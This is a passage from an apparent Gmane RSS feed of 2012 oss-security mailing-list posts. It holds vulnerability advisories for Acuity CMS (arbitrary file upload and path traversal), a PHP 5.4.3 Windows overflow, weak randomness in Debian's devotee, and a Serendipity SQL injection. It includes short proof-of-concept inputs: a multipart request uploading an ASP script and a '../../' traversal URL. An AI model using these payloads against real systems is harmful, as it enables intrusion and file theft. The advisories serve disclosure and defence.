Content-Disposition: form-data; name="status"

confirmed
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="action"

fileUpload
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="file1"; filename="0wned.asp"
Content-Type: application/octet-stream

&amp;lt;% response.write("0wned!") %&amp;gt;

-----------------------------6dc3a236402e2--

[/REQUEST]


6. SOLUTION

The Acuity CMS is no longer in active development.
It is recommended to use another CMS in active development and support.


7. VENDOR

The Collective
http://www.thecollective.com.au/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-05-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_arbitrary_fileupload

#yehg [2012-05-20]

&lt;/pre&gt;</description>
    <dc:creator>YGN Ethical Hacker Group</dc:creator>
    <dc:date>2012-05-20T09:48:55</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7710">
    <title>Acuity CMS 2.6.x &lt;= Path Traversal Arbitrary File Access</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7710</link>
    <description>&lt;pre&gt;1. OVERVIEW

Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Path Traversal.


2. BACKGROUND

Acuity CMS is a powerful but simple, extremely easy to use, low
priced, easy to deploy content management system. It is a leader in
its price and feature class.


3. VULNERABILITY DESCRIPTION

The issue is due to the script, /admin/file_manager/browse.asp, not
properly sanitizing user input, specifically directory traversal style
attacks (e.g., ../../) supplied via the 'path' parameter. It would
allow the attacker to access arbitrary files outside of web root
directory.


4. VERSIONS AFFECTED

Tested with version 2.6.2.


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/admin/file_manager/browse.asp?field=&amp;amp;form=&amp;amp;path=../../


6. SOLUTION

The Acuity CMS is no longer in active development.
It is recommended to use another CMS in active development and support.


7. VENDOR

The Collective
http://www.thecollective.com.au/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-05-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_path_traversal

#yehg [2012-05-20]

&lt;/pre&gt;</description>
    <dc:creator>YGN Ethical Hacker Group</dc:creator>
    <dc:date>2012-05-20T09:47:35</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7708">
    <title>CVE Request: PHP 5.4.3 on Windows com_print_typeinfo() Buffer Overflow (?)</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7708</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Original sources:
https://isc.sans.edu/diary/PHP+5+4+Remote+Exploit+PoC+in+the+wild/13255
http://packetstormsecurity.org/files/112851/php54-exec.txt
http://www.exploit-db.com/exploits/18861/
http://www.reddit.com/r/netsec/comments/tuyp3/isc_diary_php_54_remote_exploit_poc_in_the_wild/

- From the exploit:

// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)

There appears to be a buffer overflow in com_print_typeinfo(), it
appears to only affect PHP on Windows (COM object related).

- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993


&lt;/pre&gt;</description>
    <dc:creator>Kurt Seifried</dc:creator>
    <dc:date>2012-05-20T04:23:14</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7704">
    <title>CVE id request: devotee (debian vote engine) cryptographically weak random numbers permit discovery of secret ballot submissions</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7704</link>
    <description>&lt;pre&gt;Hi,

It has been disclosed [0] that the debian vote engine (devotee) [1]
uses cryptographically weak pseudo-random numbers (intended to be
48-bit, but really only 32-bit due to the use of a 32-bit seed feeding
the 48-bit number generator) to generate ballot secret monikers.  This
allows unprivileged persons to brute force the contents of presumably
secret election ballots, and makes it possible to calculate the
contents of secret voter ballots in all past debian elections.

Ideally, devotee should use a random secret moniker with fully 64 (or
preferably 128) bits that would require years rather than minutes or
days to brute force [2].

The source also uses /dev/urandom, which has less entropy than /dev/random.

Please assign an id for this issue.

Thanks,
Mike

[0] https://lists.debian.org/debian-devel/2012/04/msg00528.html
[1] http://anonscm.debian.org/gitweb/?p=users/srivasta/debian/devotee.git
[2] http://www.codinghorror.com/blog/2006/07/brute-force-key-attacks-are-for-dummies.html

&lt;/pre&gt;</description>
    <dc:creator>Michael Gilbert</dc:creator>
    <dc:date>2012-05-18T21:48:22</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7703">
    <title>CVE-2012-2762 Serendipity include/functions_trackbacks.inc.php SQL injection</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7703</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

https://github.com/s9y/Serendipity/commit/87153991d06bc18fe4af05f97810487c4a340a92
http://blog.s9y.org/archives/241-Serendipity-1.6.2-released.html
CVE-2012-2762

(different affected versions than CVE-2012-2332)

- -- 
CVE assignment team, MITRE CVE Numbering Authority
M/S S145
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/obtain_id.html ]

&lt;/pre&gt;</description>
    <dc:creator>cve-assign-AZamIotjMK3YtjvyW6yDsg&lt; at &gt;public.gmane.org</dc:creator>
    <dc:date>2012-05-18T20:28:36</dc:date>
  </item>
  <textinput rdf:about="http://search.gmane.org/?group=$group=gmane.comp.security.oss.general">
    <title>Search Engine</title>
    <description>Search the mailing list at Gmane</description>
    <name>query</name>
    <link>http://search.gmane.org/?group=$group=gmane.comp.security.oss.general</link>
  </textinput>
</rdf:RDF>

